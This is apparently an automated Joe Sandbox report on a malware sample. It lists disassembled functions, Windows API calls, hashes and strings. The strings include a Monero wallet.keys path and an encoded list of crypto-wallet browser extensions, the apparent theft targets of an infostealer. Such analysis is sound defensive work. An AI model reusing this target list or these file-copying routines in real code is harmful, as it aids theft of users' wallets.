rcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGphY3BrbWpta2NhZmNocHBibnBuaGRtb258MXwwfDB8RWx, xrefs: 00196565

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID: rcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGphY3BrbWpta2NhZmNocHBibnBuaGRtb258MXwwfDB8RWx
API String ID: 941982115-2363891162
Opcode ID: d9ef9255b04eff3580fc667a6968dc4ccd57b14a57320ef7f87ba49ec8fe9912
Instruction ID: c0eaf75bb5c1343f53f9c71095ed499a4033290f18c17d4074b07d664453f058
Opcode Fuzzy Hash: d9ef9255b04eff3580fc667a6968dc4ccd57b14a57320ef7f87ba49ec8fe9912
Instruction Fuzzy Hash: B2F05870900205EFFF11ABA0DC0AB7E7778AF18781F528414B916A5095CBF065048BB5

Function 6C68C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C68C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C68C969
GetSystemInfo.KERNEL32(?), ref: 6C68C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C68C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C68C9E2

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: cb57595f118f1758c93bff4230bd61748a5b03148aa976642d3247b6165ee782
Instruction ID: 2fd10167984c5f841c72a342b0593c1d251beabfb9684447e481b5e01146318c
Opcode Fuzzy Hash: cb57595f118f1758c93bff4230bd61748a5b03148aa976642d3247b6165ee782
Instruction Fuzzy Hash: 6521D7327422147BDF04AE65ECC4BAE73BAAB86744F50025AFA17A7B40DB605C0487BD

Function 001978A0 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 001978D7
RtlAllocateHeap.NTDLL(00000000), ref: 001978DE
RegOpenKeyExA.KERNEL32(80000002,0139BD58,00000000,00020119,?), ref: 001978FE
RegQueryValueExA.KERNEL32(?,013AD5B8,00000000,00000000,000000FF,000000FF), ref: 0019791F
RegCloseKey.ADVAPI32(?), ref: 00197932

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 73d7511ed323d2ff519420b9b8d3c7cba89a8e3b8d18eef984bb7b2a2e5e821a
Instruction ID: ddb374e65f8357f29e2689eb585133f89e12d225bb6ae5eab78036b6822202ba
Opcode Fuzzy Hash: 73d7511ed323d2ff519420b9b8d3c7cba89a8e3b8d18eef984bb7b2a2e5e821a
Instruction Fuzzy Hash: 83119EB1A54205EFDB05CF94DD4AFBBBB7CFB49B20F104219F60AA7280D77458008BA0

Function 001812A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 001812B4
RtlAllocateHeap.NTDLL(00000000), ref: 001812BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 001812D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001812F5
RegCloseKey.ADVAPI32(?), ref: 001812FF

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 9e7254f8e458440097e627053b5aa98ce0172146d21a5c925f869c8863759e1b
Instruction ID: 446f0f7d51feb9fa21cc998da38a011015958ee6cc9ad9eefc0805b846ec5ec9
Opcode Fuzzy Hash: 9e7254f8e458440097e627053b5aa98ce0172146d21a5c925f869c8863759e1b
Instruction Fuzzy Hash: 1E01E1B9A40208BFDB14DFE4DC49FAEB77DEB48701F108158FA0597280DB709A05CB50

Function 00196B70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000), ref: 00196B7E

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

memset.MSVCRT ref: 00196C0A

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00196C2C

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcpymemset
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 4047604823-4138519520
Opcode ID: 6d3f2ad1270551ca50f4396f92003adaed98414a9ea045486ec7c8c676528925
Instruction ID: 6ab35cf6224f0918d994166ff2f1ba9782f9de206fcbc2c8638e04e378d75283
Opcode Fuzzy Hash: 6d3f2ad1270551ca50f4396f92003adaed98414a9ea045486ec7c8c676528925
Instruction Fuzzy Hash: AD5183B0D002189FDF24EB90DC95BEEB3B4AF54304F9441A9E11977181EB746E88CFA5

Function 00189FF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(013A8B20,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF), ref: 0018A00D
LoadLibraryA.KERNEL32(013AD5D8), ref: 0018A096

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Part of subcall function 0019A1F0: lstrlen.KERNEL32(00184F55,?,?,00184F55,001A0DC6), ref: 0019A1FB
Part of subcall function 0019A1F0: lstrcpy.KERNEL32(001A0DC6,00000000), ref: 0019A255

Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2

Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

SetEnvironmentVariableA.KERNEL32(013A8B20,00000000,00000000,?,001A1290,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,001A0AE6), ref: 0018A082

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0018A002, 0018A016, 0018A02C

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-4027016359
Opcode ID: f189f90bc58a7cc39c6bfa377f5ca1e124cb117a7eb1ecfae04a4cc63aba2933
Instruction ID: 7895339a6d2cfcd0773d9b01bf3120145357add971f073fdb7f1a43592dd5ce8
Opcode Fuzzy Hash: f189f90bc58a7cc39c6bfa377f5ca1e124cb117a7eb1ecfae04a4cc63aba2933
Instruction Fuzzy Hash: 80416371924104AFCB16EBB4EC56FAE77BDBF1A302F545029F405A32A0EB705A44CFA1

Function 0018A1B0 Relevance: 6.4, APIs: 4, Instructions: 360filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

Part of subcall function 00198600: GetSystemTime.KERNEL32(001A0E02,013A9C08,001A059E,?,?,001813F9,?,0000001A,001A0E02,00000000,?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 00198626

Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0018A231
lstrlen.KERNEL32(00000000), ref: 0018A5EA

Part of subcall function 00189E60: LocalAlloc.KERNEL32(00000040,?), ref: 00189EFE

lstrlen.KERNEL32(00000000,00000000), ref: 0018A32D
DeleteFileA.KERNEL32(00000000), ref: 0018A671

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTime
String ID:
API String ID: 3104408854-0
Opcode ID: 34b7f7fd13c14fe04b305e8af5718422da87fb3e68784adecc6e41f88a2abde8
Instruction ID: 41beab7536a86320c5536d1b0bf72fd012b6671822a7399f8aa4fad9a0d819c4
Opcode Fuzzy Hash: 34b7f7fd13c14fe04b305e8af5718422da87fb3e68784adecc6e41f88a2abde8
Instruction Fuzzy Hash: 70D17D728101189ACF15FBA4DC96EEE7338AF65300F908169F516720A1EF716B4CCBE6

Function 0018D5C0 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

Part of subcall function 00198600: GetSystemTime.KERNEL32(001A0E02,013A9C08,001A059E,?,?,001813F9,?,0000001A,001A0E02,00000000,?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 00198626

Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0018D641
lstrlen.KERNEL32(00000000), ref: 0018D7DF
lstrlen.KERNEL32(00000000), ref: 0018D7F3
DeleteFileA.KERNEL32(00000000), ref: 0018D872

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: ffff0d4b5dbd6aea8d9a645777ef4ca0f22a1caebc6f6fb2e2e3a9f120ad718b
Instruction ID: e7cb908ef9c3e7e4f93d5763296da5ad5197d74621094b94be294355ebce0616
